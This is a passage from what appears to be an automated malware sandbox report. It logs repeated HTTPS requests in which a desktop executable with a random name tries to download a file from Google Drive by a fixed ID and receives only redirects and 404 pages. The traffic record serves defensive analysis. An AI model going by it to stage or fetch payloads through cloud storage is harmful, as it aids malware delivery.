2024-12-03 16:25:50 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:51 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:51 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-E3SL-r0hctxHGFX8VRfLEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC5GQWEqRgPNTFwzgx-9_mXkpGGwCjPNsEZAGTKOdiZ_SB30ExC_QLCu2cWBcizoe15JR8zRqYZ1oQ Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:25:51 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 5a 55 44 6a 2d 61 74 5f 31 79 48 35 35 6f 79 76 47 51 71 4d 62 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ZUDj-at_1yH55oyvGQqMbQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49963	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:53 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:54 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:54 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-ZHtKzR_9gFrWrqTOPOp9Rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49964	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:56 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:25:57 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:25:57 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-mEk3TmjwGJzJy7oiUWC7ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC7lxyRjYr-0TlRhywSH3PcboZ8zH1cYvAF2MlskU-v3ri_e0Y6qaySvDn-pJoWK23yAQw_h85bB3w Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:25:57 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 54 59 4d 34 72 77 41 31 42 49 65 46 79 36 58 74 63 44 71 2d 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TTYM4rwA1BIeFy6XtcDq-Q">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49965	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:25:59 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:00 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:00 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-Jqd3egMuC7MOWuZlAdJj3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49966	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:02 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:03 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:02 GMT Content-Security-Policy: script-src 'nonce-GUfdNp9Y8W4ROMNRSIx-ag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 X-GUploader-UploadID: AFiumC6yOryCjVV3EbeUPRCxsjmBilTy1OBwe3mp30y50a8AhDz2NIny20i1IKUnw5xBzbDOM3sGq5LmLg Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:26:03 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 6e 53 41 42 52 4c 78 4a 48 71 31 30 79 58 77 4e 67 65 68 64 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="knSABRLxJHq10yXwNgehdA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49967	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:05 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:06 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:05 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-8SHQc6z9HPMnsxh_XW2Qtg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49968	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:07 UTC	459	OUT	GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:08 UTC	1854	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:08 GMT Content-Security-Policy: script-src 'nonce--MWVypKTJpvoZBJQG-DpWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 X-GUploader-UploadID: AFiumC5PnXHGCOH4U0tLIdcp2EiDEstZnrcLE95LsHQ4uhq0LTK1vFJqg7gPWO1Z38B4qI_NiL8vow_5rg Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-03 16:26:08 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 6c 52 77 47 42 32 36 55 69 69 55 68 75 52 4f 42 37 6e 5f 76 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wlRwGB26UiiUhuROB7n_vQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49969	172.217.19.174	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 16:26:10 UTC	417	OUT	GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
2024-12-03 16:26:11 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 03 Dec 2024 16:26:11 GMT Location: https://drive.usercontent.google.com/download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-ypj5VyeLJHEBteW_i9Byhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49970	142.250.181.33	443	2200	C:\Users\user\Desktop\eAvqHiIsgR.exe

Timestamp	Bytes transferred	Direction	Data
